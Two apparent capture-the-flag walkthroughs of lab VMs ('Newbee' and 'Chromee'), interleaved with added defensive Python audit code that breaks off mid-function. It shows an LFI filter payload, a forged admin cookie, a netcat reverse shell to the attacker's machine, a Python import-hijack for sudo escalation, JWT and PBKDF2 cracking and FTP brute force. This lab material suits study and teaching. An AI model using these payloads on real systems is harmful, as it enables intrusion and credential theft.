
Information gathering

arp-scan -l

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:f5:b9:af PCS Systemtechnik GmbH
192.168.31.122 00:0c:29:71:20:21 VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.384 seconds (107.38 hosts/sec). 3 responded

192.168.31.122 is the target's IP address.

Scan all ports with nmap 192.168.31.122 -p-

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.122 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 08:21 EDT
Nmap scan report for 192.168.31.122
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:71:20:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

Port 80

Viewing the page source, at the very bottom there is a comment:

<!--Wrong paramter to GET-->

Fuzz the GET parameter name:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.31.122?FUZZ=/etc/passwd" --hh 18851
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.31.122?FUZZ=/etc/passwd/
Total requests: 220559

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001799: 200 376 L 1270 W 18863 Ch "hack"

The parameter name fuzzes out as hack, but the bottom of the page still shows an error:

<!-- include failed try another file -->

Try including other files.

Directory scanning turns up a secret.php:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.122/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.122/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/about.php (Status: 200) [Size: 10036]
/blog.php (Status: 200) [Size: 9782]
/products.php (Status: 200) [Size: 12163]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 317] [--> http://192.168.31.122/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 321] [--> http://192.168.31.122/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]

secret.php can execute commands but requires authentication first; try including secret.php through the LFI:

http://192.168.31.122/?hack=php://filter/convert.base64-encode/resource=secret.php

It can be pulled out this way; the decoded source:

#secret.php
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>命令行控制台</title>
    <style>
        body {
            background-color: #1e1e1e;
            font-family: Consolas, monospace;
            color: #fff;
            margin: 0;
            padding: 0;
        }

        .console {
            width: 80%;
            margin: 50px auto;
            padding: 20px;
            background-color: #000;
            border-radius: 8px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
            height: 400px;
            overflow-y: auto;
            font-size: 16px;
        }

        .output {
            white-space: pre-wrap;
            margin-bottom: 10px;
        }

        .input-container {
            display: flex;
            align-items: center;
        }

        .input-container .prompt {
            color: #00ff00;
            margin-right: 5px;
        }

        .input-container input {
            background: transparent;
            border: none;
            color: #fff;
            width: 100%;
            padding: 5px;
            font-size: 16px;
            outline: none;
        }

        .input-container input:focus {
            border: 1px solid #00ff00;
        }

        .input-container input::placeholder {
            color: #888;
        }

        .console-footer {
            padding-top: 10px;
            color: #888;
            font-size: 12px;
            text-align: center;
        }
    </style>
</head>
<body>

<div class="console">
    <div class="output" id="output">
        <?php
        if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {
            if (isset($_GET['command'])) {
                $command = $_GET['command'];
                $output = shell_exec($command);
                echo '<div>\> ' . htmlspecialchars($command) . '</div>';
                echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
            }
        } else {
            echo '<div>No permission to execute commands, lacking admin permission.</div>';
        }
        ?>
    </div>

    <div class="input-container">
        <span class="prompt">\></span>
        <form method="get">
            <input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
        </form>
    </div>
</div>

<script>
    const inputField = document.getElementById("input");
    inputField.focus();
</script>

</body>
</html>

Forge the cookie:

Cookie: AreYouAdmin=yes

Then get a reverse shell:

nc -e /bin/bash 192.168.31.129 4444
script -qc /bin/bash /dev/null # get an interactive shell

Privilege escalation

www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Temporary failure in name resolution
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty

User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
#vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():
    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():
    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # deliberately sleep 2 seconds
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():
    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

A random.py can be created in /var/www/html to hijack the import: Python searches the script's own directory first when loading modules.

#random.py
import os
os.system("bash -p")
www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
debian@Newbee:/var/www/html$
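As an added example (not code from the writeup or from the target VM), this is the audit a defender would run over a sudoers rule like the one above: Python prepends the script's own directory to sys.path, so any module vuln.py imports can be shadowed by a same-named file that the invoking user is able to write next to it. The vuln.py and random.py below are constructed stand-ins that mirror the page's layout; the temp directory and the permission bits are assumptions.

```python
"""Audit a sudo/doas-invoked Python script for import hijacking from its own directory."""
import ast
import os
import stat
import tempfile
from pathlib import Path


def imported_top_level_names(script_path: Path) -> set:
    """Top-level module names the script imports (import x / from x import y)."""
    tree = ast.parse(script_path.read_text(encoding="utf-8"))
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def shadowing_modules(script_path: Path) -> list:
    """Imports that would resolve to a file in the script's own directory before the stdlib."""
    script_dir = script_path.resolve().parent
    hits = []
    for name in sorted(imported_top_level_names(script_path)):
        if (script_dir / f"{name}.py").is_file() or (script_dir / name / "__init__.py").is_file():
            hits.append(name)
    return hits


def writable_by_others(path: Path) -> bool:
    """True when group or world can write to the path (anyone could plant a module there)."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(script_path: Path) -> dict:
    """Findings a reviewer of a sudoers/doas rule can act on."""
    script_dir = script_path.resolve().parent
    return {
        "script": str(script_path),
        "shadowed_imports": shadowing_modules(script_path),
        "dir_writable_by_others": writable_by_others(script_dir),
    }


def demo(plant_module: bool = True) -> dict:
    """Rebuild the page's layout in a temp dir: vuln.py plus an optional planted random.py."""
    root = Path(tempfile.mkdtemp())
    # Constructed stand-in for /var/www/html/vuln.py with the same imports as on the page.
    (root / "vuln.py").write_text(
        "import random\nimport time\nimport math\nimport string\nimport datetime\n"
        "print(random.randint(1, 1000))\n", encoding="utf-8")
    if plant_module:
        # Constructed: the file an unprivileged user would drop next to the script.
        (root / "random.py").write_text("# planted module\n", encoding="utf-8")
    os.chmod(root, 0o777)  # assumption: a web root the service account can write to
    return audit(root / "vuln.py")


if __name__ == "__main__":
    print(demo())
```

On Python 3.11 and later, running the script with python3 -P (or PYTHONSAFEPATH=1) stops the script directory from being added to sys.path, which is a cheap mitigation on top of fixing the directory ownership and mode; older interpreters only have the permission fix.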

This gives the debian user. The home directory has a note.txt and a config.php:

debian@Newbee:~$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
debian@Newbee:~$ cat config.php
<?php
$servername = "localhost";
$username = "root";
$password = "


$conn = new mysqli($servername, $username, $password);

............
............

We need the database password.

Check listening ports:

debian@Newbee:~$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*

There is a local port 5000; forward it out with socat:

debian@Newbee:~$ socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000

It is a message board. At the login, any username other than admin can log in freely; the cookie holds a JWT, so presumably the intended path is JWT forgery.

The signing secret can be brute-forced with hashcat:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 -m 16500 ./1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMzEyMyIsImV4cCI6MTc0MzAyNTM4OH0.qTMF9XS0BYo7nKIDg9rFr1qmUfR4btXsLS7GZv2QVW4:noob

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 16500 (JWT (JSON Web Token))
Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZS...v2QVW4
Time.Started.....: Wed Mar 26 08:44:45 2025 (3 secs)
Time.Estimated...: Wed Mar 26 08:44:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2052.7 kH/s (0.87ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5025792/14344385 (35.04%)
Rejected.........: 0/5025792 (0.00%)
Restore.Point....: 5021696/14344385 (35.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: noobface888 -> nona1807
Hardware.Mon.#1..: Util: 44%

Started: Wed Mar 26 08:44:44 2025
Stopped: Wed Mar 26 08:44:49 2025

noob is the secret. Forging the username as admin shows the message board content.
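The hashcat run above recovered the board's HS256 secret from rockyou in three seconds, which says more about the secret than about the algorithm. As an added example (not code from the writeup or the message-board application), the following shows the verification a server should perform and the secret-length gate that would have rejected "noob" at deployment time; the field names and expiry handling are assumptions.

```python
"""HS256 JWT issue/verify with algorithm pinning, constant-time comparison and a secret-strength gate."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

MIN_SECRET_BYTES = 32  # RFC 7518 section 3.2: an HS256 key must be at least 256 bits


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(payload: dict, secret: bytes) -> str:
    """Issue a token; the server pins HS256 rather than trusting whatever 'alg' a client presents."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    mac = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify(token: str, secret: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the payload when signature and expiry check out, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # refuses alg=none and algorithm-confusion tokens outright
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None  # constant-time compare; a payload with a swapped username fails here
        payload = json.loads(b64url_decode(payload_b64))
        if not isinstance(payload, dict):
            return None
    except (ValueError, TypeError, UnicodeDecodeError):
        return None
    current = time.time() if now is None else now
    if "exp" in payload and current >= payload["exp"]:
        return None
    return payload


def secret_is_acceptable(secret: bytes) -> bool:
    """A dictionary word such as "noob" fails this check; the board should never have started with it."""
    return len(secret) >= MIN_SECRET_BYTES


def new_secret() -> bytes:
    """Generate a secret that meets the minimum; store it in configuration, not in code."""
    return secrets.token_bytes(MIN_SECRET_BYTES)
```

With a 32-byte random secret, the hashcat mode 16500 run above degrades from a wordlist hit to an infeasible 2^256 search; the verification logic itself is unchanged, which is why the length gate belongs in deployment checks.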

debian@Newbee:~$ mysql -uroot -pTheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

No entry for terminal type "unknown";
using dumb terminal settings.
No entry for terminal type "unknown";
using dumb terminal settings.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

The user table in the user database holds debian's password hash:

Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd                                                                                                                   | salt                             | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
|  1 | debian   | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60   |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.001 sec)

For cracking the PBKDF2 hash, see https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 2
sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 ./2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Wed Mar 26 08:49:58 2025
Stopped: Wed Mar 26 08:49:59 2025
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat ./2 --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx
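The row above stores a hex digest, a hex salt and a label of the form pbdf2$iterations$dklen, which hashcat auto-detected as PBKDF2-HMAC-SHA256. As an added example (not code from the writeup or the message-board application), here is the server-side check that should consume such a row, plus a parameter audit: 50500 iterations is well below current guidance, which is part of why the rockyou run finished in a second. The PAGE_ROW values are copied from the page; the OWASP figure and the minimum salt length are the assumptions.

```python
"""Verify a stored PBKDF2 record in constant time and flag weak storage parameters."""
import hashlib
import hmac
import os

MIN_ITERATIONS = 600_000  # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256
MIN_DKLEN = 32
MIN_SALT_BYTES = 16

# Row from the page's user table, exactly as stored (hex digest, hex salt, label)
PAGE_ROW = {
    "username": "debian",
    "passwd": "2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0",
    "salt": "8bf3e3452b78544f8bee9400d6936d34",
    "passwd_hash_algo": "pbdf2$50500$60",
}


def parse_algo(label: str):
    """Split 'pbdf2$<iterations>$<dklen>' (the page's spelling) into its numbers."""
    name, iterations, dklen = label.split("$")
    if name not in ("pbdf2", "pbkdf2"):
        raise ValueError(f"unsupported algorithm label {label!r}")
    return int(iterations), int(dklen)


def derive(password: str, salt: bytes, iterations: int, dklen: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen)


def verify_password(candidate: str, row: dict) -> bool:
    """Login check: derive with the stored parameters and compare in constant time."""
    iterations, dklen = parse_algo(row["passwd_hash_algo"])
    derived = derive(candidate, bytes.fromhex(row["salt"]), iterations, dklen)
    return hmac.compare_digest(derived, bytes.fromhex(row["passwd"]))


def make_row(username: str, password: str,
             iterations: int = MIN_ITERATIONS, dklen: int = MIN_DKLEN) -> dict:
    """Create a record with a fresh random salt and current parameters."""
    salt = os.urandom(MIN_SALT_BYTES)
    return {
        "username": username,
        "passwd": derive(password, salt, iterations, dklen).hex(),
        "salt": salt.hex(),
        "passwd_hash_algo": f"pbkdf2${iterations}${dklen}",
    }


def weak_parameters(row: dict) -> list:
    """Findings about the stored parameters, independent of whether the password is guessable."""
    iterations, dklen = parse_algo(row["passwd_hash_algo"])
    findings = []
    if iterations < MIN_ITERATIONS:
        findings.append(f"iterations {iterations} < {MIN_ITERATIONS}")
    if dklen < MIN_DKLEN:
        findings.append(f"dklen {dklen} < {MIN_DKLEN}")
    if len(bytes.fromhex(row["salt"])) < MIN_SALT_BYTES:
        findings.append(f"salt shorter than {MIN_SALT_BYTES} bytes")
    return findings
```

Raising the iteration count only slows a guess linearly; the password 1qaz2wsx is a keyboard walk that sits early in every wordlist, so the audit is a complement to, not a substitute for, a breached-password check at registration.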

The user's home directory also has a .secret directory containing a password-protected zip:

debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls
hint.txt password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!

The zip password is the MD5 of 1qaz2wsx.

The image inside is pixelated (mosaic); there is a project on GitHub for recovering pixelated text:

https://github.com/spipm/Depixelization_poc

There is actually no need to run it: the original image is the example image from that project.

The password is hellofromtheotherside.

debian@Newbee:/tmp$ su - root
Password:
root@Newbee:~#

Information gathering

arp-scan -l

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:01:8c:4d PCS Systemtechnik GmbH
192.168.31.100 08:00:27:f9:e1:65 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded

The IP is 192.168.31.100; scan ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.100 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT
Nmap scan report for chromee.hmv (192.168.31.100)
Host is up (0.0019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
23333/tcp open elxmgmt
MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds

Port 80

Directory scan with gobuster:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php (Status: 200) [Size: 3]
/secret.php (Status: 200) [Size: 549]

There is a post.php and a secret.php; secret.php is not parsed as PHP and is served as a download:

#secret.php
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

echo "<h1>{$greeting},adriana</h1>";
echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
echo "<p>你的IP:{$visitorIP}</p>";
if (isset($_GET['aaa'])) {
    $file_content = file_get_contents('/opt/note/dic.txt');
    echo $file_content;
} else {
    die();
}
?>
</body>
</html>

Port 8080

First scan directories with gobuster:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100:8080" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.100:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 328] [--> http://192.168.31.100:8080/javascript/]
/silence (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]

There is a /silence directory; visiting it gives Forbidden.

With Burp's BypassPro extension, a different form of the request returns a 301, which looked off; appending index.html to the path bypasses it.

The page contains an email address. After adding its domain to the hosts file and visiting http://chromee.hmv/secret.php, secret.php is now parsed as PHP; pass aaa=1 via GET:

下午好,adriana
当前时间:2025-03-21 12:28:34

你的IP:192.168.31.1

The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.

There are two names here, adriana and Lily. Generate a wordlist for each with cupp, merge them, and brute-force FTP (port 23333):

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task
[DATA] attacking ftp://192.168.31.100:23333/
[23333][ftp] host: 192.168.31.100 login: adriana password: Lily2020
[STATUS] attack finished for 192.168.31.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31

The credentials were brute-forced.

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ftp adriana@192.168.31.100 23333
Connected to 192.168.31.100.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||20808|)
150 Here comes the directory listing.
drwxr-xr-x 2 106 115 4096 Mar 09 08:13 .
drwxr-xr-x 4 0 0 4096 Mar 09 08:12 ..
-rw-r--r-- 1 0 0 3414 Mar 09 08:13 ...
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
226 Directory send OK.

There is a file named ... here. At first I took it for a directory; I could not cd into it, and without reading the error I just ignored it (sigh, details decide success or failure), which got me stuck for a long time. The time was not wasted, though: under /srv there is a zeus.conf that is needed later for privilege escalation:

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5941|)
150 Here comes the directory listing.
drwxr-x--- 5 1000 1000 4096 Mar 21 08:18 follower
drwxr-x--- 5 1001 1001 4096 Mar 21 05:37 softly
226 Directory send OK.

This also reveals the usernames.

The ... file is a private key; john can crack its passphrase:

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# john 1 --show
id:cassandra
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ssh follower@192.168.31.100 -i id
Enter passphrase for key 'id':
follower@Chromee:~$

Privilege escalation

follower's home has a cat.gif and a note.txt:

follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.

The 47 clearly hints at ROT47.

convert can split cat.gif into 12 frames, but they are of no use:

convert cat.gif 1.jpg

If it is not in the spatial axis, try the time axis:

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6

Drop the trailing six 6s, feed the rest into CyberChef to decode, then apply ROT47.

This gives p3p573r. From the zeus.conf obtained earlier, follower needs a password to run wfuzz as softly.
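The CyberChef step above can be reproduced end to end without ImageMagick. As an added example (not code from the writeup), the block below builds a minimal GIF89a carrying the page's frame delays, walks the GIF block structure to read the delay field of each graphic control extension (the same centisecond value identify prints with %T), drops the ordinary 6-tick frames and applies ROT47. The GIF fixture is constructed; the delay list is the one printed on the page, and treating 6 as the padding value is an assumption drawn from that output.

```python
"""Read GIF frame delays directly from the container and decode the message hidden in them."""
import struct

# Delays printed by identify on the page (centiseconds per frame); 6 is the normal frame timing
PAGE_DELAYS = [65, 98, 65, 100, 102, 98, 67, 6, 6, 6, 6, 6, 6]


def build_gif(delays, width=1, height=1) -> bytes:
    """Constructed fixture: a minimal GIF89a whose frames carry the given delays."""
    out = bytearray(b"GIF89a")
    out += struct.pack("<HHBBB", width, height, 0x00, 0, 0)            # logical screen, no global color table
    for delay in delays:
        out += b"\x21\xF9\x04\x00" + struct.pack("<H", delay) + b"\x00\x00"  # graphic control extension
        out += b"\x2C" + struct.pack("<HHHH", 0, 0, width, height) + b"\x00"  # image descriptor
        out += b"\x02\x02\x44\x01\x00"   # LZW min code size 2, one 2-byte sub-block, terminator
    out += b"\x3B"                       # trailer
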